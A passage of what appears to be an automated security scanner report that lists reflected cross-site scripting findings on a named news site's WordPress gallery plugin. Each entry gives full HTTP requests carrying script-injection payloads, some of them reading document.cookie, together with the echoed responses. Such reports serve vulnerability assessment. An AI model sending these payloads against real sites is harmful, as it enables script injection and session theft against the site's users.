X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:21:20 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:21:20 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51079

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/nextgen-smooth-gallery/SmoothGalleryfa6ec\"><script>alert(1)</script>2330f6dab85/css/jd.gallery.css'; }); return true;" >
...[SNIP]...

4.269. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/css/jd.gallery.css [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/css/jd.gallery.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1d8d"><script>alert(1)</script>d206ca5bb4b was submitted in the REST URL parameter 5. This input was echoed as c1d8d\"><script>alert(1)</script>d206ca5bb4b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/cssc1d8d"><script>alert(1)</script>d206ca5bb4b/jd.gallery.css HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:22:10 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:22:12 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:22:12 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51079

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/cssc1d8d\"><script>alert(1)</script>d206ca5bb4b/jd.gallery.css'; }); return true;" >
...[SNIP]...

4.270. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/css/jd.gallery.css [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/css/jd.gallery.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0586"><script>alert(1)</script>6a63903b8c8 was submitted in the REST URL parameter 6. This input was echoed as c0586\"><script>alert(1)</script>6a63903b8c8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/css/jd.gallery.cssc0586"><script>alert(1)</script>6a63903b8c8 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:23:10 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:23:12 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:23:12 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51079

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/css/jd.gallery.cssc0586\"><script>alert(1)</script>6a63903b8c8'; }); return true;" >
...[SNIP]...

4.271. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26543"><script>alert(1)</script>022d4cef610 was submitted in the REST URL parameter 1. This input was echoed as 26543\"><script>alert(1)</script>022d4cef610 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content26543"><script>alert(1)</script>022d4cef610/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.js HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:19:18 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:19:19 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:19:19 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51085

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content26543\"><script>alert(1)</script>022d4cef610/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.js'; }); return true;" >
...[SNIP]...

4.272. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41322"><script>alert(1)</script>74e5a90858e was submitted in the REST URL parameter 2. This input was echoed as 41322\"><script>alert(1)</script>74e5a90858e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins41322"><script>alert(1)</script>74e5a90858e/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.js HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:20:28 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:20:28 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:20:28 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51085

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins41322\"><script>alert(1)</script>74e5a90858e/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.js'; }); return true;" >
...[SNIP]...

4.273. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89d9a"><script>alert(1)</script>d4a9b58102d was submitted in the REST URL parameter 3. This input was echoed as 89d9a\"><script>alert(1)</script>d4a9b58102d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/nextgen-smooth-gallery89d9a"><script>alert(1)</script>d4a9b58102d/SmoothGallery/scripts/jd.gallery.js HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:21:13 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:21:13 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:21:13 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51085

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/nextgen-smooth-gallery89d9a\"><script>alert(1)</script>d4a9b58102d/SmoothGallery/scripts/jd.gallery.js'; }); return true;" >
...[SNIP]...

4.274. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac37c"><script>alert(1)</script>27d3f8281f2 was submitted in the REST URL parameter 4. This input was echoed as ac37c\"><script>alert(1)</script>27d3f8281f2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/nextgen-smooth-gallery/SmoothGalleryac37c"><script>alert(1)</script>27d3f8281f2/scripts/jd.gallery.js HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:22:08 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:22:11 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:22:11 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51085

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/nextgen-smooth-gallery/SmoothGalleryac37c\"><script>alert(1)</script>27d3f8281f2/scripts/jd.gallery.js'; }); return true;" >
...[SNIP]...

4.275. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.js [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload efc96"><script>alert(1)</script>9d117380136 was submitted in the REST URL parameter 5. This input was echoed as efc96\"><script>alert(1)</script>9d117380136 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scriptsefc96"><script>alert(1)</script>9d117380136/jd.gallery.js HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:23:13 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:23:15 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:23:15 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51085

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scriptsefc96\"><script>alert(1)</script>9d117380136/jd.gallery.js'; }); return true;" >
...[SNIP]...

4.276. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.js [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3174f"><script>alert(1)</script>9f37b5db3df was submitted in the REST URL parameter 6. This input was echoed as 3174f\"><script>alert(1)</script>9f37b5db3df in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.js3174f"><script>alert(1)</script>9f37b5db3df HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:24:16 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:24:18 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:24:18 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51085

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.js3174f\"><script>alert(1)</script>9f37b5db3df'; }); return true;" >
...[SNIP]...

4.277. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.transitions.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.transitions.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e056"><script>alert(1)</script>02c4b7b6fdd was submitted in the REST URL parameter 1. This input was echoed as 9e056\"><script>alert(1)</script>02c4b7b6fdd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content9e056"><script>alert(1)</script>02c4b7b6fdd/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.transitions.js HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:18:46 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:18:50 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:18:50 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51109

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content9e056\"><script>alert(1)</script>02c4b7b6fdd/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.transitions.js'; }); return true;" >
...[SNIP]...

4.278. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.transitions.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.transitions.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c839d"><script>alert(1)</script>7284c39bd27 was submitted in the REST URL parameter 2. This input was echoed as c839d\"><script>alert(1)</script>7284c39bd27 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/pluginsc839d"><script>alert(1)</script>7284c39bd27/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.transitions.js HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:20:00 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:20:04 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:20:04 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51109

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/pluginsc839d\"><script>alert(1)</script>7284c39bd27/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.transitions.js'; }); return true;" >
...[SNIP]...

4.279. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.transitions.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.transitions.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3ac9"><script>alert(1)</script>441c81ccd97 was submitted in the REST URL parameter 3. This input was echoed as e3ac9\"><script>alert(1)</script>441c81ccd97 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/nextgen-smooth-gallerye3ac9"><script>alert(1)</script>441c81ccd97/SmoothGallery/scripts/jd.gallery.transitions.js HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:20:51 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:20:52 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:20:52 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51109

